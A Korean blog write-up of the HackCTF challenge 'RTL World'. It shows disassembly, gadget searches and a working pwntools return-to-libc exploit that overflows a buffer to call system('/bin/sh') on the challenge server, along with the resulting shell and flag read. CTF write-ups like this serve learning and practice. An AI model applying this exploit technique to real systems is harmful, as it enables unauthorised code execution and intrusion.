시작

안녕하세요 :D

이 사이트 참 좋은 것 같습니다 ㅎㅎ 힐링하는 느낌 들고 좋네요.

바로 이어서 첫 200점짜리 문제, RTL World 풀어볼게요!!

Write UP

root@goorm:/workspace/LCH_Server/HackCTF/11.RTL_world# ./rtl_world
세그멘테이션 오류 (core dumped)

???

nc로 붙여볼게요.

NPC [Village Presient] :
Binary Boss made our village fall into disuse...
If you Have System Armor && Shell Sword.
You can kill the Binary Boss...
Help me Pwnable Hero... :(

Your Gold : 1000
======= Welcome to RTL World =======
1) Information the Binary Boss!
2) Make Money
3) Get the System Armor
4) Get the Shell Sword
5) Kill the Binary Boss!!!
6) Exit
====================================
>>>

아.. 귀찮아보이네요.

.
.
   0x08048be0 <+605>:   mov    DWORD PTR [esp],0x0
   0x08048be7 <+612>:   call   0x8048560 <read@plt>
   0x08048bec <+617>:   mov    eax,0x0
   0x08048bf1 <+622>:   jmp    0x8048c10 <main+653>
   0x08048bf3 <+624>:   mov    DWORD PTR [esp],0x80490b2
   0x08048bfa <+631>:   call   0x80485a0 <puts@plt>
   0x08048bff <+636>:   mov    DWORD PTR [esp],0x0
   0x08048c06 <+643>:   call   0x80485d0 <exit@plt>
   0x08048c0b <+648>:   jmp    0x8048a6e <main+235>
   0x08048c10 <+653>:   leave
   0x08048c11 <+654>:   ret

?? 654줄?

.. 하나하나 정적분석 했는데 알아낸 것은

Get_Money() 함수에서 4를 주면 히든 옵션!! 이라면서 엄청 많은 골드를 떨궈준다는 것 정도??

동적으로 분석을 못하니 ebp-0xc, ebp-0x8, ebp-0x4가 뭔지 감이 오지 않더라구요.

read()로 터뜨려야 하는데.. 라며 고민하던 중 가젯을 한 번 찾아봤어요.

root@goorm:/workspace/LCH_Server/HackCTF/11.RTL_world# ROPgadget --binary ./rtl_world --string "/bin/sh"
Strings information
============================================================
0x08048eb1 : /bin/sh
root@goorm:/workspace/LCH_Server/HackCTF/11.RTL_world# gdb -q ./rtl_world
Reading symbols from ./rtl_world...(no debugging symbols found)...done.
gdb-peda$ p system
$1 = {} 0x80485b0 <system@plt>
gdb-peda$ quit
root@goorm:/workspace/LCH_Server/HackCTF/11.RTL_world# rp-lin-x86 -f ./rtl_world -r 2 | grep "pop"
0x08048542: add esp, 0x08 ; pop ebx ; ret  ;  (1 found)
0x08048ca3: add esp, 0x08 ; pop ebx ; ret  ;  (1 found)
0x08048543: les ecx,  [eax] ; pop ebx ; ret  ;  (1 found)
0x08048ca4: les ecx,  [eax] ; pop ebx ; ret  ;  (1 found)
0x08048c7f: pop ebp ; ret  ;  (1 found)
0x08048545: pop ebx ; ret  ;  (1 found)
0x08048ca6: pop ebx ; ret  ;  (1 found)
0x08048c7e: pop edi ; pop ebp ; ret  ;  (1 found)

??? system() 함수에 “/bin/sh”?

from pwn import *

context.log_level = "debug"

p = remote("ctf.j0n9hyun.xyz", 3010)

payload = ""
pr = 0x8048545
system = 0x80485b0
binsh = 0x8048eb1

p.recvuntil(">>> ")
p.sendline("5")

p.recvuntil(" > ")

payload += "A" * 144
payload += p32(system)
payload += p32(pr)
payload += p32(binsh)

p.sendline(payload)

p.interactive()

?? 끝!!

[+] Opening connection to ctf.j0n9hyun.xyz on port 3010: Done
[DEBUG] Received 0x1b bytes:
    '\n'
    '\n'
    'NPC [Village Presient] : '
[DEBUG] Received 0x176 bytes:
    '\n'
    'Binary Boss made our village fall into disuse...\n'
    'If you Have System Armor && Shell Sword.\n'
    'You can kill the Binary Boss...\n'
    'Help me Pwnable Hero... :(\n'
    '\n'
    'Your Gold : 1000\n'
    '======= Welcome to RTL World =======\n'
    '1) Information the Binary Boss!\n'
    '2) Make Money\n'
    '3) Get the System Armor\n'
    '4) Get the Shell Sword\n'
    '5) Kill the Binary Boss!!!\n'
    '6) Exit\n'
    '====================================\n'
    '>>> '
[DEBUG] Sent 0x2 bytes:
    '5\n'
[DEBUG] Received 0xb bytes:
    '[Attack] > '
[DEBUG] Sent 0x9d bytes:
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
    *
    00000090  b0 85 04 08  45 85 04 08  b1 8e 04 08  0a           │····│E···│····│·│
    0000009d
[*] Switching to interactive mode
$ cat flag
[DEBUG] Sent 0x9 bytes:
    'cat flag\n'
[DEBUG] Received 0x22 bytes:
    ///flag!!

Exploit!! 허-무 그 자체네요.

마무리

골드를 벌어서 System Armor와 Shell Sword를 사고 Attack으로 때리려고 했는데

바닥에 더 좋은 칼이 떨어져 있었던 문제였습니다.

from pwn import *

context.log_level = "debug"

p = remote("ctf.j0n9hyun.xyz", 3010)

payload = ""
pr = 0x8048545
system = 0x80485b0
binsh = 0x8048eb1

p.recvuntil(">>> ")
p.sendline("2")

p.recvuntil(">>> ")
p.sendline("4")

p.recvuntil(">>> ")
p.sendline("1")

p.recvuntil("live in 0x")
boss = int(p.recv(8), 16)

log.info("boss lives in " + hex(boss))

p.recvuntil(">>> ")
p.sendline("3")

p.recvuntil("Armor : 0x")
system_armor = int(p.recv(8), 16)

log.info("System Armor = " + hex(system_armor))

p.recvuntil(">>> ")
p.sendline("4")

p.recvuntil("Sword : 0x")
shell_sword = int(p.recv(8), 16)

log.info("Shell Sword = " + hex(shell_sword))

p.recvuntil(">>> ")
p.sendline("5")

p.recvuntil(" > ")

//how to use read()...

이러고 있었는데 말이에요.

감사합니다.. :D

'CTF_Write_UP > HackCTF' 카테고리의 다른 글

[HackCTF] Random Key (0)	2019.09.22
[HackCTF] 1996 (0)	2019.09.22
[HackCTF] Poet (0)	2019.09.22
[HackCTF] Yes or no (0)	2019.09.19
[HackCTF] 1 ~ 9번 문제 (1)	2019.09.18

보안 초보의 성장일지

[HackCTF] RTL_World

시작

Write UP

마무리

'CTF_Write_UP > HackCTF' 카테고리의 다른 글

티스토리툴바

[HackCTF] RTL_World

시작

Write UP

마무리

'CTF_Write_UP > HackCTF' 카테고리의 다른 글

'CTF_Write_UP/HackCTF' Related Articles

티스토리툴바